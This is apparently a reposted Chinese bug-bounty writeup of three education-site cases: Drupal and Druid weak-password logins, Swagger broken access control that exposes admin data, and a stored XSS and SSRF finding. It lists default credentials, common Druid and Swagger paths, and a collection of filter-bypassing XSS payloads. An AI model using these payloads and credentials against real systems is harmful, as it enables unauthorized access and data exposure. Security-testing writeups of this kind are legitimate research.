文章总结: 本文分享了三个教育SRC漏洞挖掘实战案例。案例一利用Drupal弱口令成功登录后台;案例二通过若依后台凭证结合Druid弱口令及Swagger越权获取敏感信息;案例三在小程序上传中利用特殊绕过Payload成功实现存储XSS与SSRF验证。文章提供了多种XSS绕过语句,强调基础测试与逻辑漏洞的重要性。 综合评分: 75 文章分类: SRC活动,WEB安全,渗透测试,漏洞POC,实战经验
记几个edusrc简单挖掘案例
原创
陌笙 陌笙
陌笙不太懂安全
2026年1月17日 18:16 河北
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
案例1-弱口令
资产收集之后,点开这个页面看到右上角这个蓝色的图标是渗透靶场经常出现的drupal,可能有nday
可以在插件里面找一下这个图标的路径,放大查看
去网上找了找了nday打了一下发现没出货之前打靶场的时候都是登录框有问题于是找了一下登录路径
/user/login #fuzz出来的,接口里面找不到
我直接一个admin/123456
后面带着cookie打了打nday,依旧没东西,这个弱口令没被发现,感觉就是因为正确情况,连登录框都找不到。。依旧掌握狗运。
案例2-若依相关漏洞
资产收集之后,看指纹,里面有若依,访问查看。
直接给出了用户名和密码,点击登录,成功进入后台这种情况我都碰到好几次了,不过都是重复。。
进了后台,打了半天nday,依旧空军。。。后面想了一下,经常和若依出现的还有他的好兄弟druid和swagger,进行拼接尝试。。。
常见路径/druid/login.html/prod-api/druid/login.html/dev-api/druid/login.html我一般只手工拼接这三个,也可以使用工具直接扫描工具使用曾哥的这个就挺好用。。
druid常见弱口令admin/123456ruoyi/123456druid/druid
又经过拼接发现swagger页面但是只有文档页面/prod-api/v2/api-docs/v2/api-docs/v1/api-docs/prod-api/v1/api-docs/dev-api/v2/api-docs
这种不方便我们查看直接使用插件打开
直接尝试了一下都是401未授权但是我们之前已经有了管理员账户用它创建一个低权限的用户,直接使用管理员cookie的话,不合适,因为本来就有这些功能,创建一个什么权限都没有的用户,更能证明危害。
创建好之后,使用低权限用户进行登录,然后复制Authorization后面的值,来到插件进行鉴权
成功后查看第一个接口,发现管理员的密码,和手机号等信息也算一个小越权。。后面接口也是同理,不在一一演示。
案例3-存储xss/ssrf
小程序这个上传存储xss很多
直接点击头像进行上传,直接上传html不让传上传图片之后再进行修改html后缀能上传但是上传之后不能弹窗,被防火墙拦截了。使用poc'>"><iframe src=javascript:top[`ale`+`rt`](1)>
后面看了看历史包,发现有数据包里面有url尝试ssrf漏洞不能探测内网,但是能访问dnslog服务器,edusrc可以水1rank。。。
如果下次遇到上传存储xss之后不能弹窗,可以直接使用,这几个语句
复制到数据包里面发送就行,70%应该有一个会成功。
<svg/onload=setTimeout('\x61\x6C\x65\x72\x74\x28\x31\x29')>
<input/%00/autofocus=""/%00/onfocus=.1|alert`XSS`>
<svg/onload=window.location='javas'+'cript:ale'+'rt(1)'>
javascript:window['al'+'ert']('xss')(image_url)
'>"><iframe src=javascript:top[`ale`+`rt`](1)>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4="></iframe>
<iframe src/="data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4="></iframe>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">
<dETAILS open onToGgle=a=confirm,a(1) x>()
<img src=x onerror=eval("alet(1)")>
<iframe src=javascript:prompt(1)>
'>"><img/src/onclick=_=alert;_(123)>
<textarea></textarea><script>alert("1")</script></textarea>
</textarea><a onbeforecopy="prompt(1)" contenteditable>test222</a></textarea>
<iframe src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><object data='data:text/html;base64,PFNDUklQVD5hbGVydCgneHNzJyk7PC9TQ1JJUFQ+' /src><details open ontoggle=[43804..toString(36)].some(confirm)>
<svg/onload=setTimeout('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')>
<img src=http://www.baidu.com x=” ⋌ ” </:>1><</:>button formaction\=alert(1)<">M<<br>
<form><button formaction=javascript:alert(1)>CLICKME
后台回复”加群”加入交流群
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:陌笙不太懂安全 陌笙 陌笙《记几个edusrc简单挖掘案例》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论